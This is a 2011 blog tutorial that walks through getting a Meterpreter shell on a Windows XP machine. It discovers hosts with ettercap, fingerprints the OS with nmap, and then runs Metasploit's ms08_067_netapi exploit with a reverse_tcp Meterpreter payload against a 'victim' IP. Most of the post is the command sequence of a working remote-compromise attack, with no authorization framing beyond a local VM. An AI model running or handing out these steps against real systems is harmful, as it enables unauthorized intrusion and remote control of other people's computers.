Friday, 23 December 2011

How to get a meterpreter shell.

How to get a meterpreter shell.


Now in this tutorial I am using backtrack 4 r2 and going to be showing you how to get a meterpreter shell.Here are the basics of gaining any type of shell.


How do we check for live hosts?

First we are going to be scanning to check what ports are open and OS (Operating System) fingerprinting. But before we do that your probably wondering how do we check if people are on the network and if they are what are their IP addresses. Well What I do and believe it is the easiest way by far is running ettercap. So lets run ettercap open up a console and type in.ettercap -G and ettercap will open up.

ettercap -G 

  
then ettercap opens up.
 
 
Now you can use hotkeys like I do make you look 1337 in front of people but for now we'll just use the mouse SNIFF > UNIFIED SNIFF and choose you interface mine is going to be vmnet1 Beacuse my Windows xp installation is in VmWare. Yours might be wlan0 if your on a wireless network or eth0 if connected LAN.
 
 
Now let's scan HOSTS > SCAN FOR HOSTS I recommend you scan a couple times then HOSTS > HOST LIST  and you get your list.
 
 
How do we scan for ports and know what OS he's using?
  
Okay pick an IP address from the list and remember it. Now open up a new console to scan the victim with namp. Now nmap has a lot of options so it's really easy to get confused.but I don't want to talk too much about it just yet. So now back to our console type in nmap -O [your victims IP] . The -O options is Operating system detection. Then you should get something like this. Now just by looking at this we know its a Windows XP with our favorite port open 445 SMB.
nmap -O 192.168.0.128


Now what do we do with our favorite port and all this information?


Now lets open up METASPLOIT .
cd /pentest/exploits/framework3/ 
./msfconsole

***TIP**
Now always run svnup before starting your attack to update metasploit. You also need to know you IP address if you don't know how type in  
 
ifconfig.

Now we now the port number we want to attack it was 445 smb let's use one of the best exploits out right now ms08_067_netapi will never fail you on a XP system trust me on this. Now that we know what exploit we are going to use lets set our payload now the payload is the type of shell you want to spawn could be a vnc cmd or a meterpreter. In this tutorial we are going for a reverse tcp meterpreter witch means he will connect to you. 
 
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp 

Now lets see what options we need to set in order to launch the eaploit. Now type in show options and you will get something like what I have below. Do you see where it says required yes that means fill it out. First thing we see is the RHOST remote host witch is the victims ip address next thing is the LHOST local host our ip address. 
 
set rhost 192.168.0.128 [VIMTIM IP]
set lhost 192.168.0.1 [OUR IP]




Now lets run it. If everything goes well then you should get something like what i got.
 
exploit



No comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...